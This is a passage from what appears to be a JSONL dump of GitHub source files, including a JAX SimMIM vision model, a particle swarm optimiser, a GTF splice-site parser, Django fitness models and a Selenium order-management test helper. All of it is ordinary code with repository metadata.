open(f'{preprocess_data_path}/train', 'wb') as f:\n pickle.dump((X_train, y_train), f)\n \n #Save the test_data as a pickle file to be used by the predict component.\n with open(f'{preprocess_data_path}/test', 'wb') as f:\n pickle.dump((X_test, y_test), f)\n \n return(print('Done!'))","repo_name":"chasecadet/ezaf","sub_path":"pipelines/v1 /containerized_python_components/digit-recognition-kaggle-competition/components/GPT_files /preprocess_data /preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"13512145256","text":"import dataclasses\nfrom typing import Any, Tuple\n\nimport einops\nimport jax.numpy as jnp\nfrom flax import linen\n\nfrom .HiViT import HierarchicalViT\nfrom .SwinV2 import SwinTransformerV2\nfrom .ViT import VisionTransformer\n\n\nclass WindowedNorm(linen.Module):\n target_size: Tuple[int]\n window_size: int = 47\n\n def get_targets_count(self):\n window_shape = (self.window_size, self.window_size)\n padding = (\n (self.window_size // 2, self.window_size // 2),\n (self.window_size // 2, self.window_size // 2),\n )\n\n targets_count = jnp.ones((1, self.target_size[0], self.target_size[1], 1))\n\n targets_count = linen.avg_pool(\n targets_count,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=True,\n )\n targets_count = targets_count * jnp.power(self.window_size, 2.0)\n targets_count = jnp.int32(jnp.rint(targets_count))\n return targets_count\n\n def setup(self):\n self.targets_count = self.variable(\n \"simmim_constants\",\n \"targets_count\",\n self.get_targets_count,\n ).value\n\n def __call__(self, targets):\n window_size = self.window_size\n\n window_shape = (window_size, window_size)\n padding = (\n (window_size // 2, window_size // 2),\n (window_size // 2, window_size // 2),\n )\n\n targets_ = targets\n\n targets_square = jnp.power(targets, 2.0)\n\n targets_mean = linen.avg_pool(\n targets,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=False,\n )\n targets_square_mean = linen.avg_pool(\n targets_square,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=False,\n )\n\n targets_var = targets_square_mean - jnp.power(targets_mean, 2.0)\n targets_var = targets_var * (self.targets_count / (self.targets_count - 1))\n targets_var = jnp.maximum(targets_var, 0.0)\n\n targets_ = (targets_ - targets_mean) / jnp.sqrt(targets_var + 1.0e-6)\n\n return targets_\n\n\nclass SwinTransformerV2ForSimMIM(SwinTransformerV2):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n mask_token = linen.dtypes.promote_dtype(self.mask_token, dtype=self.dtype)[0]\n mask_tokens = jnp.broadcast_to(mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, L, 1)).astype(mask_tokens.dtype)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n x = self.pos_drop(x, deterministic=not train)\n\n for layer in self.swin_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return self.patch_size * 2 ** (len(self.depths) - 1)\n\n\nclass VisionTransformerForSimMIM(VisionTransformer):\n def setup(self):\n 
super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n mask_tokens = jnp.broadcast_to(self.mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, L, 1)).astype(mask_tokens.dtype)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n x = self.pos_emb(x)\n\n for layer in self.vit_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return self.patch_size\n\n\nclass HierarchicalViTForSimMIM(HierarchicalViT):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n H = W = int(L**0.5)\n mask_token = linen.dtypes.promote_dtype(self.mask_token, dtype=self.dtype)[0]\n mask_tokens = jnp.broadcast_to(mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, H, W, 1)).astype(mask_tokens.dtype)\n mask = self.patch_embed.patches_reshape(mask)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n for layer in self.vit_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return 16\n\n\nclass SimMIM(linen.Module):\n encoder: linen.Module = SwinTransformerV2ForSimMIM\n encoder_stride: int = 32\n\n patch_size: int = 4\n\n enable_windowed_norm: bool = False\n norm_patch_size: int = 47\n\n dtype: Any = jnp.float32\n\n @linen.compact\n def __call__(self, x, mask, train: bool = False):\n z = self.encoder(x, mask, train)\n x_rec = linen.Conv(\n features=self.encoder_stride**2 * 3,\n kernel_size=(1, 1),\n dtype=self.dtype,\n )(z)\n x_rec = einops.rearrange(\n x_rec,\n pattern=\"... h w (c b1 b2) -> ... 
(h b1) (w b2) c\",\n b1=self.encoder_stride,\n b2=self.encoder_stride,\n )\n\n mask = jnp.expand_dims(\n jnp.repeat(\n jnp.repeat(mask, self.patch_size, axis=1),\n self.patch_size,\n axis=2,\n ),\n axis=-1,\n )\n\n B, H, W, C = x.shape\n if self.enable_windowed_norm:\n x = WindowedNorm(target_size=(H, W), window_size=self.norm_patch_size)(x)\n\n x_rec = linen.dtypes.promote_dtype(x_rec, dtype=x.dtype)[0]\n loss_recon = jnp.abs(x - x_rec)\n loss = jnp.sum(loss_recon * mask) / (jnp.sum(mask) + 1e-5) / C\n\n return loss, x_rec\n\n @classmethod\n def build(cls, config, **kwargs):\n encoder = config.encoder.build(config.encoder, **kwargs)\n\n config = dataclasses.asdict(config)\n config = {key: kwargs[key] if key in kwargs else config[key] for key in config}\n config[\"encoder\"] = encoder\n config[\"encoder_stride\"] = encoder.get_stride()\n return cls(**config)\n\n def extend_parser(self, parser):\n parser = self.encoder.extend_parser(parser)\n parser.add_argument(\n \"--enable-windowed-norm\",\n action=\"store_true\",\n help=\"Use windowed norm of input images as reconstruction target in SimMIM\",\n )\n return parser\n\n def should_decay(self, path, _):\n if path[0].key == \"encoder\":\n return self.encoder.should_decay(path[1:], _)\n\n is_kernel = path[-1].key == \"kernel\"\n verdict = is_kernel\n return verdict\n\n\ndef simmim_swinv2_tiny():\n config = {\n \"embed_dim\": 96,\n \"depths\": (2, 2, 6, 2),\n \"num_heads\": (3, 6, 12, 24),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_swinv2_base():\n config = {\n \"embed_dim\": 128,\n \"depths\": (2, 2, 18, 2),\n \"num_heads\": (4, 8, 16, 32),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_swinv2_large():\n config = {\n \"embed_dim\": 192,\n \"depths\": (2, 2, 18, 2),\n \"num_heads\": (6, 12, 24, 48),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_vit_small():\n config = {\n \"num_layers\": 12,\n \"embed_dim\": 384,\n \"mlp_dim\": 1536,\n \"num_heads\": 6,\n }\n encoder = VisionTransformerForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_vit_base():\n config = {\n \"num_layers\": 12,\n \"embed_dim\": 768,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n }\n encoder = VisionTransformerForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.patch_size,\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_hivit_tiny():\n config = {\n \"depths\": (1, 1, 10),\n \"embed_dim\": 96,\n \"mlp_ratio\": (3.0, 3.0, 4.0),\n \"num_heads\": (None, None, 6),\n }\n encoder = HierarchicalViTForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_hivit_small(**kwargs):\n config = {\n \"depths\": (2, 2, 20),\n \"embed_dim\": 96,\n \"mlp_ratio\": (3.0, 3.0, 4.0),\n \"num_heads\": (None, None, 6),\n }\n encoder = 
HierarchicalViTForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n","repo_name":"SmilingWolf/JAX-CV","sub_path":"Models/SimMIM.py","file_name":"SimMIM.py","file_ext":"py","file_size_in_byte":9908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"16589553675","text":"\"\"\"\nImporting necessary libraries.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nClass to represent a function to be minimized.\n\"\"\"\nclass function:\n def func(x):\n return((x[1][0]-x[0][0])**4 + 12*x[0][0]*x[1][0] - x[0][0] + x[1][0] - 3)\n\n\"\"\"\nFOllowing class represnts a particle in population.\n\"\"\"\nclass particle(function):\n \"\"\"\n Following function initializes a particle's parameters.\n \"\"\"\n def __init__(self):\n self.x = np.random.rand(2,1)\n self.v = np.random.rand(2,1)\n self.p = self.x\n self.x_arr = []\n self.x_arr.append(self.x)\n self.level_set = []\n self.level_set.append(function.func(self.x))\n \nclass PSO(function):\n \"\"\"\n Following function initializes the swarm based on provided parameters.\n \"\"\"\n def __init__(self,epochs,d,w,c1,c2):\n self.swarm = []\n self.best = []\n self.worst = []\n self.average = []\n for i in range(d):\n par = particle()\n self.swarm.append(par)\n self.d = d\n self.w = w\n self.c1 = c1\n self.c2 = c2\n self.epochs = epochs\n self.g = None\n for i in range(d):\n if(i == 0):\n self.g = self.swarm[0].x\n elif(function.func(self.g)>function.func(self.swarm[i].x)):\n self.g = self.swarm[i].x\n \n \"\"\"\n Following function generates a new swarm for each iteration and essentially minimizes the function.\n \"\"\"\n def minimize(self):\n for i in range(self.epochs):\n for j in range(self.d):\n r = np.random.uniform(0.01,1,(2,1))\n s = np.subtract(np.ones((2,1)),r)\n self.swarm[j].v = np.add(np.add(np.multiply(self.w,self.swarm[j].v) , np.multiply(self.c1,np.multiply(r,np.subtract(self.swarm[j].p,self.swarm[j].x)))),np.multiply(self.c2,np.multiply(s,np.subtract(self.g,self.swarm[j].x))))\n self.swarm[j].x = self.swarm[j].x + self.swarm[j].v\n self.swarm[j].x_arr.append(self.swarm[j].x)\n self.swarm[j].level_set.append(function.func(self.swarm[j].x))\n if(function.func(self.swarm[j].x) < function.func(self.swarm[j].p)):\n self.swarm[j].p = self.swarm[j].x\n worst_curr = -999999\n avg_curr = 0\n best_curr = 999999\n for j in range(self.d):\n if(function.func(self.swarm[j].x)worst_curr):\n worst_curr = function.func(self.swarm[j].x)\n avg_curr = avg_curr + function.func(self.swarm[j].x) \n if(function.func(self.swarm[j].x) < function.func(self.g)):\n self.g = self.swarm[j].x\n avg_curr = avg_curr/(self.d)\n self.best.append(best_curr)\n self.average.append(avg_curr)\n self.worst.append(worst_curr)\n print(\"minimum value : \",function.func(self.g),\"minimizer point:\",self.g)\n \n \"\"\"\n Following function is used to generate a list of function values from given list x2 and x1. 
\n \"\"\"\n def fx_contour(self,x1,x2):\n return np.power(x2-x1,4)+(12*x1*x2)-x1+x2-3\n \n \"\"\"\n Following function is used to plot a contour plot and the plot of best, average and worst function values for each iteration.\n \"\"\"\n def plot(self):\n X = np.linspace(-1,1,50)\n Y = np.linspace(-1,1,50)\n X,Y = np.meshgrid(X,Y)\n Z = self.fx_contour(X,Y)\n plt.contour(X,Y,Z,colors='black')\n for j in range(self.d):\n x1 = []\n x2 = []\n self.swarm[j].x_arr = np.array(self.swarm[j].x_arr)\n for i in range(self.epochs + 1):\n x1.append(self.swarm[j].x_arr[i][0][0])\n x2.append(self.swarm[j].x_arr[i][1][0])\n plt.plot(x1,x2,color='blue')\n plt.scatter(x1,x2,color='red')\n plt.show()\n X = []\n for i in range(len(self.best)):\n X.append(i+1)\n plt.plot(X,self.best,color='green')\n plt.scatter(X,self.best,color='green')\n plt.plot(X,self.average,color='blue')\n plt.scatter(X,self.average,color='blue')\n plt.plot(X,self.worst,color='red')\n plt.scatter(X,self.worst,color='red')\n plt.ylabel(\"Function value\")\n plt.xlabel(\"Iteration\")\n plt.title(\"Best, average and worst function value at each iteration\")\n plt.show()\n\n\"\"\"\nFollowing piece of code initializes a PSO object, calls minimize function and plots final graphs.\n\"\"\"\nnum_of_particles = 14\nnum_of_iterations = 20\nparticle_best_weight = 1.8\nglobal_best_weight = 1.8\nparticle_previous_influence_weight = 0.8\npso = PSO(num_of_iterations,num_of_particles,particle_previous_influence_weight,particle_best_weight,global_best_weight)\npso.minimize()\npso.plot()","repo_name":"Shahil98/Optimization-Algorithms","sub_path":"PSO/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"947566822","text":"pkgname = \"waypipe\"\npkgver = \"0.8.6\"\npkgrel = 0\nbuild_style = \"meson\"\nconfigure_args = [\n \"-Dwith_dmabuf=enabled\",\n \"-Dwith_systemtap=false\",\n \"-Dwith_vaapi=enabled\",\n \"-Dwith_video=enabled\",\n \"-Dwith_zstd=enabled\",\n \"-Db_ndebug=true\",\n]\nhostmakedepends = [\n \"meson\",\n \"pkgconf\",\n \"scdoc\",\n \"wayland-progs\",\n]\nmakedepends = [\n \"ffmpeg-devel\",\n \"libdrm-devel\",\n \"libva-devel\",\n \"zstd-devel\",\n \"mesa-devel\",\n \"wayland-devel\",\n \"wayland-protocols\",\n]\npkgdesc = \"Proxy for wayland clients\"\nmaintainer = \"psykose \"\nlicense = \"MIT\"\nurl = \"https://gitlab.freedesktop.org/mstoeckl/waypipe\"\nsource = f\"https://gitlab.freedesktop.org/mstoeckl/waypipe/-/archive/v{pkgver}/waypipe-v{pkgver}.tar.bz2\"\nsha256 = \"da40de2e02d60c2c34d549e791a9019c1ddf9d79f42bfad0c6cb74f3f6af9b16\"\nhardening = [\"vis\", \"cfi\"]\n\n\ndef post_install(self):\n self.install_license(\"COPYING\")\n","repo_name":"chimera-linux/cports","sub_path":"contrib/waypipe/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"36"}
+{"seq_id":"74143297703","text":"def coolString(inputString):\n\n def isLowercase(symbol):\n if 'a' <= symbol <= 'z':\n return True\n return False\n\n def isUppercase(symbol):\n if 'A' <= symbol <= 'Z':\n return True\n return False\n\n firstIsLowercase = isLowercase(inputString[0])\n firstIsUppercase = isUppercase(inputString[0])\n\n if not (firstIsLowercase or firstIsUppercase):\n return False\n\n for i in range(1, len(inputString)):\n if i % 2 != 0:\n if (isLowercase(inputString[i]) == firstIsLowercase or\n isUppercase(inputString[i]) == 
firstIsUppercase):\n return False\n else:\n if (isLowercase(inputString[i]) != firstIsLowercase or\n isUppercase(inputString[i]) != firstIsUppercase):\n return False\n\n return True\n","repo_name":"jahirulislammolla/CodeFights","sub_path":"Fights/coolString.py","file_name":"coolString.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"6228768502","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n# Create your models here.\n\n\n\n# ? not sure whether to have user on workouts or workouts on user?\n# ! calculating speed in serializers\n# ? graph relationships to workouts. many to one? how would model show \n# ? fields to have on graph model?\n# * have levels associated with graph for exp?\n\n\nclass MuscleTraining(models.Model):\n name = models.CharField(max_length=50)\n muscles_worked = models.CharField(max_length=100)\n weight = models.IntegerField()\n duration = models.IntegerField(null=True)\n sets = models.IntegerField()\n reps = models.IntegerField()\n speed = models.IntegerField(null=True)\n user = models.ForeignKey(User, related_name='muscle_trainings', on_delete=models.CASCADE)\n\n def __str__(self):\n return f'{self.name}'\n\nclass Cardio(models.Model):\n type = models.CharField(max_length=50)\n duration = models.IntegerField()\n distance = models.IntegerField()\n speed = models.FloatField(null=True)\n user = models.ForeignKey(User, related_name='cardios', on_delete=models.CASCADE)\n def __str__(self):\n return f'{self.type}'\n\n\n","repo_name":"tombannister01/Fitness-Tracker-App","sub_path":"workouts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"21588445168","text":"#Blinks LED on pin 13 - Adafruit Edge Badge\n#No other files required\n\nimport time\nimport board\nfrom digitalio import DigitalInOut, Direction, Pull\n\nled = DigitalInOut(board.D13)\nled.direction = Direction.OUTPUT\n\nwhile True:\n led.value = True\n time.sleep(1)\n led.value = False\n time.sleep(1)\n","repo_name":"JeremySCook/Edge-Badge","sub_path":"blink-led.py","file_name":"blink-led.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"16108409610","text":"\n# coding: utf-8\n\n# In[1]:\n\n#!/usr/bin/env python\n\n\"\"\"new_gtf_genome_wide_parser.py: New gtf parses much faster and more efficiently.\"\"\"\n\n__author__ = \"Israa Alqassem\"\n__copyright__ = \"Copyright 2017, McSplicer\"\n\n\nimport csv\nimport numpy as np\nimport time\nfrom collections import defaultdict\n\n\n\ndef get_all_genes_dict(gtf_file, tx_anno=False):\n\n gene_dict = {}\n ss_anno = defaultdict(list)\n\n with open(gtf_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n for line in reader:\n if line[2] == 'subexon':\n start_site = int(line[3])\n end_site = int(line[4])\n strand_dir = line[6]\n\n gene_id = ''\n chr_id = line[0]\n\n feature_list = line[8].split(';')\n for feature in feature_list:\n tag_val = feature.split()\n if len(tag_val) == 2:\n\n tag = tag_val[0]\n value = tag_val[1]\n\n if tag=='SpliceEnd':\n splice_end = value[1:2] # R, L, or B\n elif tag=='NodeId':\n subexon_id = int(value)\n elif tag=='transcript_id':\n trans_id = value[1:-1]\n elif tag == 'gene_id':\n gene_id = value[1:-1] #remove double quotes\n\n if gene_id != '':\n if 
gene_id not in gene_dict:\n gene_dict[gene_id] = []\n\n\n gene_dict[gene_id].append([subexon_id,strand_dir,splice_end,start_site,end_site,trans_id,chr_id])\n if tx_anno:\n ss_anno[start_site].append(trans_id)\n ss_anno[end_site].append(trans_id)\n\n return gene_dict,ss_anno\n\n\n\n\ndef create_location_dicts(start_sites, end_sites, strand_dir):\n \"\"\" This func expects sorted start_sites and end_sites based on strand direction\n Returns 3 dicts:\n loc_index_dict -> Key: location, val: index\n start_sites_dict -> key: start location, index (helps to determine s1, s2, ...)\n end_sites_dict -> key: end location, index (helps to determine e1, e2, ...)\n \"\"\"\n\n loc_index_dict = {}\n start_sites_dict = {}\n end_sites_dict = {}\n\n location_list = [] # List of all start and end locations\n location_list.extend(start_sites)\n location_list.extend(end_sites)\n\n if strand_dir == '+':\n location_list.sort()\n else:\n location_list.sort(reverse=True)\n\n index = 0\n #print 'index','location'\n for location in location_list:\n #if location not in loc_index_dict:\n #print index, location\n loc_index_dict[location] = index\n index+=1\n\n index = 0\n for location in start_sites:\n start_sites_dict[location] = index\n index+=1\n\n index = 0\n for location in end_sites:\n end_sites_dict[location] = index\n index+=1\n\n\n return loc_index_dict, start_sites_dict, end_sites_dict\n\n\ndef get_gene_data(gene_id,gene_datalist):\n\n #for gene_id in gene_dict.keys():\n\n subexon_ids_dict = {}\n start_sites = []\n end_sites = []\n\n #print '>>>>>',gene_id\n for row in gene_datalist:\n subexon_id = row[0]\n strand_dir = row[1]\n splice_end = row[2]\n start_site = row[3]\n end_site = row[4]\n trans_id = row[5]\n\n\n \"\"\"\n Forward strand (+):\n potential start sites -> Left of L\n Left of B\n potential end sites -> Right of R\n Right of B\n\n s_____s____ e_____e\n |__L__|__B__|__R__|\n\n\n Backward strand (+):\n potential start site -> right of L\n right of B\n potential end site -> Left of R\n Left of B\n\n e_____e_____s_____s\n |__R__|__B__|__L__|\n\n \"\"\"\n\n if strand_dir == '+': # Forward strand\n subexon_ids_dict[subexon_id] = [start_site,end_site]\n\n if splice_end=='R':\n end_sites.append(end_site)\n elif splice_end=='L':\n start_sites.append(start_site)\n\n elif splice_end=='B':\n start_sites.append(start_site)\n end_sites.append(end_site)\n\n elif splice_end !='-': # dash means internal exon, just ignore it, otherwise show error\n print('Error: Splice end value must be L, R, or B. Undefined splice end -> ' + splice_end)\n\n elif strand_dir == '-': # Reverse strand\n subexon_ids_dict[subexon_id] = [end_site,start_site]\n\n if splice_end=='R':\n end_sites.append(start_site)\n elif splice_end=='L':\n start_sites.append(end_site)\n\n elif splice_end=='B':\n start_sites.append(end_site)\n end_sites.append(start_site)\n\n elif splice_end !='-': # dash means internal exon, just ignore it, otherwise show error\n print('Error: Splice end value must be L, R, or B. 
Undefined splice end -> ' + splice_end)\n\n\n start_sites = list(np.unique(start_sites))\n end_sites = list(np.unique(end_sites))\n\n\n if strand_dir == '-':\n end_sites.sort(reverse=True)\n start_sites.sort(reverse=True)\n elif strand_dir == '+':\n end_sites.sort()\n start_sites.sort()\n\n\n loc_index_dict, start_sites_dict, end_sites_dict = create_location_dicts(start_sites,end_sites, strand_dir)\n\n\n\n return strand_dir,loc_index_dict, start_sites_dict, end_sites_dict, subexon_ids_dict\n\n#start_time = time.time()\n#print \"--- %s seconds ---\" % str('{0:0.2f}'.format(time.time() - start_time))\n","repo_name":"canzarlab/McSplicer","sub_path":"python_scripts/new_gtf_genome_wide_parser.py","file_name":"new_gtf_genome_wide_parser.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"28869998262","text":"class Platoon(pycbf2.NESystem):\n def __init__(self, length, t_safety, v_goal):\n super(Platoon, self).__init__()\n\n for i in range(length):\n vehicle = Link(\n parent=self,\n mass=1,\n center_of_mass=[0, 0, 0],\n inertia_tensor=np.eye(3),\n index=i,\n axis=[1, 0, 0],\n link_type=LinkType.prismatic,\n rotation_local=np.eye(3),\n position=[0, 0, 0],\n )\n\n t, x, xdot = self.cbf_vars()\n\n class Controller(cbf.ControlFunc):\n def __init__(self):\n self.cbf = 1\n for i in range(length - 1):\n self.cbf *= (x[i + 1] - x[i]) - t_safety * xdot[i]\n self.t = 0\n\n def input_matrix(self, x, xdot):\n return np.eye(length)\n\n def uref(self, x, xdot):\n return v_goal - xdot\n\n self.controller = Controller()","repo_name":"danieljpietz/MSThesis","sub_path":"Code Examples/Platoon.py","file_name":"Platoon.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"24214557733","text":"from lib.ui_lib import *\n\nclass OrderClass(CommonMethods):\n\n def get_order_number(self,browser):\n element = self.wait_until_element_present('//div[@class = \"alert alert-success\"]/p', \"XPATH\")\n browser_success_msg = element.text\n order_number = browser_success_msg[7:10]\n assert order_number != ''\n return order_number\n\n def search_order(self,browser,orderID):\n self.wait_until_element_present('keyword-filter', 'ID')\n e = browser.find_element_by_id('keyword-filter')\n e.send_keys(orderID)\n try:\n browser.find_element_by_xpath('//span[@class=\"responsive-hide\"]').click()\n except NoSuchElementException:\n browser.find_element_by_css_selector('.action-divider .filter-button').click()\n except WebDriverException:\n pass\n\n def get_order_status(self,browser, url, Order_Id):\n browser.get(urlparse.urljoin(url, '/admin/index.php?ToDo=viewOrders'))\n element = self.wait_until_element_present('//input[@id=\"keyword-filter\"]', \"XPATH\")\n element.clear()\n element.send_keys(Order_Id)\n browser.find_element_by_css_selector('.filter .btn-secondary').click()\n self.wait_until_element_present('status_' + Order_Id, 'ID')\n return browser.find_element_by_id('status_' + Order_Id).get_attribute('value')\n\n def refund_funds(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open Refund modal\n element = self.wait_until_element_present('Refund', 'LINK')\n element.click()\n # Refund transaction\n element = 
self.wait_until_element_present('//label[@for=\"refundType_full\"]', 'XPATH')\n element.click()\n browser.find_element_by_id('refund-save').click()\n\n def capture_funds(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open capture modal\n element = self.wait_until_element_present('Capture Funds', 'LINK')\n element.click()\n # Process capture\n element = self.wait_until_element_present('#display-modal .dialog-actions .btn-primary', 'CSS_SELECTOR')\n element.click()\n\n\n def void_transaction(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open capture modal\n element = self.wait_until_element_present('Void Transaction', 'LINK')\n element.click()\n # Process capture\n element = self.wait_until_element_present('#display-modal .dialog-actions .btn-primary', 'CSS_SELECTOR')\n element.click()\n\n\n def delete_order(self,browser):\n\n browser.find_element_by_xpath('//label[@for = \"order0\"]').click()\n self.select_dropdown_value(browser, 'OrderActionSelect', 'Archive Selected')\n browser.find_element_by_id('action-confirm').click()\n try:\n alert = browser.switch_to_alert()\n alert.accept()\n except WebDriverException:\n browser.execute_script(\"window.confirm = function(){return true;}\");\n browser.find_element_by_id('action-confirm').click()\n #Verify Order delete\n element = self.wait_until_element_present('//div[@class = \"alert alert-success\"]/p', \"XPATH\").text\n assert \"The selected orders have been deleted successfully.\" in element\n\n def goto_view_orders(self,browser):\n self.wait_until_element_present('Orders', 'LINK').click()\n self.wait_until_element_present('View Orders', 'LINK').click()\n\n def cp_add_order_item(self,browser,name):\n #Add an Item\n element = self.wait_until_element_present('quote-item-search', \"ID\")\n element.click()\n element.send_keys(name)\n self.wait_until_element_present('//div[@class = \"recordContent undefined\"]', 'XPATH')\n browser.execute_script(\"$('#quote-item-search').trigger('keyup')\")\n browser.execute_script(\"$('.recordContent:eq(0)').trigger('click')\")\n self.wait_until_element_present('//span[@class = \"swatchColour swatchColour_1\"]', \"XPATH\")\n browser.find_element_by_xpath('//span[@class = \"swatchColour swatchColour_1\"]').click()\n browser.find_element_by_id('dialog-options-submit').click()\n self.wait_until_element_present('//th[@class = \"image\"]', \"XPATH\")\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n self.wait_until_element_present('//label[@for = \"shipping-single\"]', 'XPATH')\n\n def cp_select_shipping_payment(self,browser, paymentname):\n browser.find_element_by_xpath('//label[@for = \"shipping-single\"]').click()\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n self.wait_until_element_present(\"//select[@id='paymentMethod']/option[text()='\"+paymentname+\"']\", \"XPATH\").click()\n self.find_element_by_css_selector('.Field_custom_name input')\n self.execute_script(\"$('.Field_custom_name input').val('\"+paymentname+\"');\")\n browser.find_element_by_xpath('//button[@class = \"btn btn-primary orderMachineSaveButton orderSaveButton\"]').click()\n\n def create_order_controlpanel(self,browser, email, 
password, firstname, lastname,company,phone,street_add1,street_add2,city,country,state,postcode, invalid_email,invalid_pwd):\n element = self.wait_until_element_present('Orders', \"LINK\")\n element.click()\n browser.find_element_by_link_text('Add an Order').click()\n element = self.wait_until_element_present('//label[@for = \"check-new-customer\"]', \"XPATH\")\n element.click()\n #Validation for Invalid Email\n browser.find_element_by_id('FormField_1').send_keys(invalid_email)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n assert \"Please enter a valid email address such as joe@example.com\" in browser.find_element_by_xpath('//div[@class = \"dialog-content\"]/p').text\n browser.find_element_by_css_selector('#display-modal .btn-primary').click()\n browser.find_element_by_id('FormField_1').clear()\n browser.find_element_by_id('FormField_1').send_keys(email)\n #Validation for Invalid Password\n browser.find_element_by_id('FormField_2').send_keys(invalid_pwd)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n assert \"The password and confirmed password do not match.\" in browser.find_element_by_xpath('//div[@class = \"dialog-content\"]/p').text\n browser.find_element_by_css_selector('#display-modal .btn-primary').click()\n browser.find_element_by_id('FormField_2').clear()\n browser.find_element_by_id('FormField_2').send_keys(password)\n browser.find_element_by_id('FormField_3').send_keys(password)\n self.select_dropdown_value(browser, 'accountCustomerGroup', '-- Do not assign to any group --')\n browser.find_element_by_id('FormField_4').send_keys(firstname)\n browser.find_element_by_id('FormField_5').send_keys(lastname)\n 